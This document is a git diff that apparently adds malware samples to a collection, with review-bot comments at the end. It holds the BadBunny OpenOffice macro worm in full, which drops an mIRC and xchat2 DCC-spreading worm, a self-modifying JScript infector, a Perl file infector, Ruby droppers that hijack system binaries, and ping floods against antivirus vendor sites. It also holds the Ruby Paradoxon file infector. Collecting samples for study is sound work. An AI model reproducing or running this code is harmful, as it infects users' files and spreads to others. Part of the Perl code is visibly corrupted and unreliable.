+Print #1, "n14= /q %NickName lets do it like a rabbit...;)"
+Print #1, "n15= /msg %NickName Be my bunny!"
+Print #1, "n16=%ccd send -c %NickName c:\badbunny.odg"
+Print #1, "n17= }"
+Print #1, "n18=}"
+Close #1
+
+if ( Dir(dirz &"\mirc") <> "") then
+Filecopy "c:\drop.bad" , dirz &"\mirc\script.ini"
+end if
+if ( Dir("c:\mirc") <> "") then
+Filecopy "c:\drop.bad" , "c:\mirc\script.ini"
+
+end if
+if ( Dir(dirz &"\mirc32") <> "") then
+Filecopy "c:\drop.bad" , dirz &"\mirc32\script.ini"
+end if
+if ( Dir("c:\mirc32") <> "") then
+Filecopy "c:\drop.bad" , "c:\mirc32\script.ini"
+end if
+
+Open "c:\badbunny.js" For Output As #2
+Print #2, "// BadBunny"
+Print #2, "var FSO=WScript.CreateObject(unescape(""%53"")+unescape(""%63"")+unescape(""%72"")+unescape(""%69"")+unescape(""%50"")+unescape(""%74"")+unescape(""%69"")+""n""+unescape(""%67"")+"".""+unescape(""%46"")+unescape(""%69"")+""l""+unescape(""%65"")+unescape(""%53"")+unescape(""%79"")+unescape(""%73"")+unescape(""%74"")+unescape(""%65"")+""mO""+unescape(""%62"")+""j""+unescape(""%65"")+unescape(""%63"")+unescape(""%74""))"
+Print #2, "var me=FSO.OpenTextFile(WScript.ScriptFullName,1)"
+Print #2, "var OurCode=me.Read(1759)"
+Print #2, "me.Close()"
+Print #2, "nl=String.fromCharCode(13,10); code=''; count=0; fcode=''"
+Print #2, "file=FSO.OpenTextFile(WScript.ScriptFullName).ReadAll()"
+Print #2, "for (i=0; i < file.length; i++) { check=0; 
if (file.charAt(i)==String.fromCharCode(123) && Math.round(Math.random()*3)==1) { foundit(); check=1 } if (!check) { code+=file.charAt(i) } }"
+Print #2, "FSO.OpenTextFile(WScript.ScriptFullName,2).Write(code+fcode)"
+Print #2, "var jsphile=new Enumerator(FSO.GetFolder(""."").Files)"
+Print #2, "for(;!jsphile.atEnd();jsphile.moveNext())"
+Print #2, "{"
+Print #2, "if(FSO.GetExtensionName(jsphile.item()).toUpperCase()==""JS"")"
+Print #2, "{"
+Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,1)"
+Print #2, "var Marker=filez.Read(11)"
+Print #2, "var allinone=Marker+filez.ReadAll()"
+Print #2, "filez.Close()"
+Print #2, "if(Marker!=""// BadBunny"")"
+Print #2, "{"
+Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,2)"
+Print #2, "filez.Write(OurCode+allinone)"
+Print #2, "filez.Close()"
+Print #2, "}"
+Print #2, "}"
+Print #2, "}"
+Print #2, "function foundit()"
+Print #2, "{"
+Print #2, "fcodea=''; count=0; randon='';"
+Print #2, "for (j=i; j < file.length; j++) { if (file.charAt(j)==String.fromCharCode(123)) { count++; } if (file.charAt(j)==String.fromCharCode(125)) { count--; } if (!count) { fcodea=file.substring(i+1,j); j=file.length; } }"
+Print #2, "for (j=0; j < Math.round(Math.random()*5)+4; j++) { randon+=String.fromCharCode(Math.round(Math.random()*25)+97) }"
+Print #2, "fcode+=nl+nl+'function '+randon+'()'+nl+String.fromCharCode(123)+nl+fcodea+nl+String.fromCharCode(125)"
+Print #2, "code+=String.fromCharCode(123)+' '+randon+'() '"
+Print #2, "i+=fcodea.length;"
+Print #2, "}"
+Print #2, "//->"
+Close #2
+Shell("c:\badbunny.js",0)
+oDoc.store()
+End Sub
+
+sub lin()
+'xchat2worm part by WarGame
+dim HomeDir as string
+dim xchat2script as string
+dim perlvir as string
+dim cmd as string
+dim WgeT as string
+Dim dummy()
+Dim iVar As Integer
+Dim Args(0) as new com.sun.star.beans.PropertyValue
+Args(0).Name = "MacroExecutionMode"
+Args(0).Value = _
+com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
+ThisComponent.LockControllers
+ 
 datei="/tmp/badbunny.odg"
+ dateiurl=converttourl(datei)
+ odoc=thisComponent
+ odoc.storeasurl(dateiurl,dummy())
+
+' get home dir
+HomeDir = Environ("HOME")
+
+'build the path of our xchat2 script
+if HomeDir = "" then
+' I could not get $HOME !
+
+else
+xchat2script = HomeDir & "/.xchat2/badbunny.py"
+
+' drop the python script
+Open xchat2script For Output As #1
+print #1,"__module_name__ = "+Chr(34)+"IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"+Chr(34)
+print #1,"__module_version__ = "+Chr(34)+"0.1"+Chr(34)
+print #1,"__module_description__ = "+Chr(34)+"xchat2 IRC_Worm for BadBunny"+Chr(34)
+print #1,"import xchat"
+print #1,"def onkick_cb(word, word_eol, userdata):"
+print #1," if xchat.nickcmp(word[3],xchat.get_info("+Chr(34)+"nick"+Chr(34)+")) != 0:"
+print #1," xchat.command("+Chr(34)+"DCC SEND "+Chr(34)+"+ word[3] +"+Chr(34)+" /tmp/badbunny.odg"+Chr(34)+")"
+print #1," return xchat.EAT_NONE"
+print #1,"xchat.hook_server("+Chr(34)+"KICK"+Chr(34)+", onkick_cb)"
+close #1
+endif
+
+'drop the perl virus
+perlvir = HomeDir & "/BadBunny.pl"
+open perlvir for output as #1
+print #1,"#BadBunny"
+print #1,"open(File,$0);@MyCode = ;close(File);"
+print #1,"foreach $FileName (<*>){open(File,$FileName);$chk = 1;while(){"
+print #1,"if($_ =~ /#BadBunny/){$chk = 0;}}close(File);if($chk eq 1){"
+print #1,"open(File,"+Chr(34)+">$FileName"+Chr(34)+");print File @MyCode;close(File);}}"
+close #1
+cmd = "perl " & perlvir
+shell(cmd,0)
+
+oDoc.store()
+end sub
+
+sub mac()
+Dim iVar As Integer
+iVar = Int((15 * Rnd) -2)
+Select Case iVar
+Case 1 To 5
+call one
+Case 6, 7, 8
+call two
+Case Is > 8 And iVar < 11
+call one
+Case Else
+call two
+End Select
+end sub
+
+sub one ()
+'thx to skyout
+Open "badbunny.rb" For Output As #1
+print #1,"#!/usr/bin/env ruby"
+print #1,"require 'ftools'"
+print #1,"def replacecmd(cmdname, dirpath)"
+print #1,"File.move(""#{dirpath}/#{cmdname}"", ""#{dirpath}/#{cmdname}_"")"
+print #1,"oldcmd = 
File.open(""#{dirpath}/#{cmdname}"", File::WRONLY|File::TRUNC|File::CREAT, 0777)"
+print #1,"oldcmd.puts ""#!/usr/bin/env ruby\n"""
+print #1,"oldcmd.puts ""puts \""\"""
+print #1,"oldcmd.puts ""puts \""\\t\\tYour system has been infected with:\"""""
+print #1,"oldcmd.puts ""puts \""\\t\\t>>>> Dropper for BadBunny"""""
+print #1,"oldcmd.puts ""puts \""\\t\\t>>>> by SkyOut"""
+print #1,"oldcmd.puts ""puts \""\"""""
+print #1,"oldcmd.puts ""puts \""Take a moment of patience ...\"""""
+print #1,"oldcmd.puts ""puts \""Executing in ...\"""""
+print #1,"oldcmd.puts ""sleep 1"""
+print #1,"oldcmd.puts ""puts \""3\"""
+print #1,"oldcmd.puts ""sleep 1"""
+print #1,"oldcmd.puts ""puts \""2\"""
+print #1,"oldcmd.puts ""sleep 1"""
+print #1,"oldcmd.puts ""puts \""1\"""
+print #1,"oldcmd.puts ""sleep 1"""
+print #1,"oldcmd.puts ""puts \""\"""
+print #1,"oldcmd.puts ""for $args in $* do"""
+print #1,"oldcmd.puts ""$argslist = \""#\{$argslist\}\"" + \"" \"" + \""#\{$args\}\"""
+print #1,"oldcmd.puts ""end"""
+print #1,"oldcmd.puts ""exec \""#{dirpath}/#{cmdname}_ #\{$argslist\}\"""
+print #1,"oldcmd.puts ""exit 0"""
+print #1,"end"
+print #1,"$binary_dirs = Array.new"
+print #1,"$binary_dirs = [ ""/bin"", ""/usr/bin"", ""/usr/local/bin"", ""/sbin"", ""/usr/sbin"", ""/usr/local/sbin"" ]"
+print #1,"for $dir in $binary_dirs do"
+print #1,"if File.directory?($dir) then"
+print #1,"if File.writable?($dir) then"
+print #1,"Dir.open($dir).each do |file|"
+print #1,"next if file =~ /^\S+_/ || file == ""."" || file == ""..""" 
+print #1,"replacecmd(file, $dir)"
+print #1,"end"
+print #1,"end"
+print #1,"end"
+print #1,"end"
+print #1,"exit 0"
+close #1
+Shell("badbunny.rb",0)
+end sub
+
+sub two() 'thx to SPTH for this... 
+Open "badbunnya.rb" For Output As #2
+print #2,"# BADB"
+print #2,"mycode="""
+print #2,"mych=File.open(__FILE__)"
+print #2,"myc=mych.read(1)"
+print #2,"while myc!=nil"
+print #2,"mycode+=myc"
+print #2,"myc=mych.read(1)"
+print #2,"end"
+print #2,"mycode=mycode[mycode.length-734,734]"
+print #2,"cdir = Dir.open(Dir.getwd)"
+print #2,"cdir.each do |a|"
+print #2,"if File.ftype(a)==""file"" then"
+print #2,"if a[a.length-3, a.length]=="".rb"" then"
+print #2,"if a!=File.basename(__FILE__) then"
+print #2,"fcode="""
+print #2,"fle=open(a)"
+print #2,"badb=fle.read(1)"
+print #2,"while badb!=nil"
+print #2,"fcode+=badb"
+print #2,"badb=fle.read(1)"
+print #2,"end"
+print #2,"fle.close"
+print #2,"if fcode[fcode.length-732,4]!=""BADB"" then"
+print #2,"fcode=fcode+13.chr+10.chr+mycode"
+print #2,"fle=open(a,""w"")"
+print #2,"fle.print fcode"
+print #2,"fle.close"
+print #2,"end"
+print #2,"end"
+print #2,"end"
+print #2,"end"
+print #2,"end"
+print #2,"cdir.close"
+close #2
+Shell("badbunnya.rb",0)
+End Sub
+
+sub ping()
+Shell("ping -l 5000 -t www.ikarus.at",0)
+Shell("ping -l 5000 -t www.aladdin.com",0)
+Shell("ping -l 5000 -t www.norman.no",0)
+Shell("ping -l 5000 -t www.norman.com",0)
+Shell("ping -l 5000 -t www.kaspersky.com",0)
+Shell("ping -l 5000 -t www.kaspersky.ru",0)
+Shell("ping -l 5000 -t www.kaspersky.pl",0)
+Shell("ping -l 5000 -t www.grisoft.cz",0)
+Shell("ping -l 5000 -t www.symantec.com",0)
+Shell("ping -l 5000 -t www.proantivirus.com",0)
+Shell("ping -l 5000 -t www.f-secure.com",0)
+Shell("ping -l 5000 -t www.sophos.com",0)
+Shell("ping -l 5000 -t www.arcabit.pl",0)
+Shell("ping -l 5000 -t www.arcabit.com",0)
+Shell("ping -l 5000 -t www.avira.com",0)
+Shell("ping -l 5000 -t www.avira.de",0)
+Shell("ping -l 5000 -t www.avira.ro",0)
+Shell("ping -l 5000 -t www.avast.com",0)
+Shell("ping -l 5000 -t www.virusbuster.hu",0)
+Shell("ping -l 5000 -t www.trendmicro.com",0)
+Shell("ping -l 5000 -t www.bitdefender.com",0)
+Shell("ping -l 5000 -t 
www.pandasoftware.comm",0)
+Shell("ping -l 5000 -t www.drweb.com",0)
+Shell("ping -l 5000 -t www.drweb.ru",0)
+Shell("ping -l 5000 -t www.viruslist.com",0)
+end sub
\ No newline at end of file
diff --git a/Ruby/Virus.Ruby.Pydoxon.b b/Ruby/Virus.Ruby.Pydoxon.b
new file mode 100644
index 00000000..92417383
--- /dev/null
+++ b/Ruby/Virus.Ruby.Pydoxon.b
@@ -0,0 +1,26 @@
+# RUBY.Paradoxon
+mycode=File.open(__FILE__).read(630)
+cdir = Dir.open(Dir.getwd)
+ cdir.each do |a|
+ if File.ftype(a)=="file" then
+ if a[a.length-3, a.length]==".rb" then
+ if a!=File.basename(__FILE__) then
+ fcode=""
+ fle=open(a)
+ spth=fle.read(1)
+ while spth!=nil
+ fcode+=spth
+ spth=fle.read(1)
+ end
+ fle.close
+ if fcode[7,9]!="Paradoxon" then
+ fcode=mycode+13.chr+10.chr+fcode
+ fle=open(a,"w")
+ fle.print fcode
+ fle.close
+ end
+ end
+ end
+ end
+ end
+cdir.close
\ No newline at end of file
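Review bot: The sample is filed under `Ruby/` as `Virus.Ruby.Badbunny.a`, but what the hunk adds is an OpenOffice StarBasic macro (`Sub badbunny()`, `Dim ... As String`, `Print #1, ...`) that merely writes out Ruby (`badbunny.rb`, `badbunnya.rb`) alongside mIRC, JScript, Python and Perl droppers, so the directory and name mislead anyone searching the corpus; a short README entry describing it as a StarBasic/OpenOffice multi-stage sample would fix that. The Perl stanza also looks damaged in transit — `open(File,$0);@MyCode = ;close(File);` and `while(){` read as if the `<File>` readline operators were stripped as markup — so the committed text may not be byte-faithful and should be checked against a known hash before it is used as a reference. Finally it is committed as plain text that runs on open in an office suite with macros enabled; archiving it (password-protected, as is conventional for live samples) would avoid accidental detonation and AV quarantine of a checkout.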
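Review bot: `Virus.Ruby.Pydoxon.b` is committed as plain, directly runnable Ruby — `mycode=File.open(__FILE__).read(630)` copies the sample's own first 630 bytes onto every other `.rb` file in the working directory — so a stray `ruby` invocation from the checkout would infect sibling files; storing it archived, or documenting it in the corpus README as a live self-replicating sample, would avoid that. Because the prepend size is the literal `630`, the sample's behaviour depends on its exact byte length, and the `\ No newline at end of file` marker shows it was kept raw; a `.gitattributes` entry marking the file `-text` (or a recorded SHA-256) would protect it from line-ending or trailing-newline normalization on later commits.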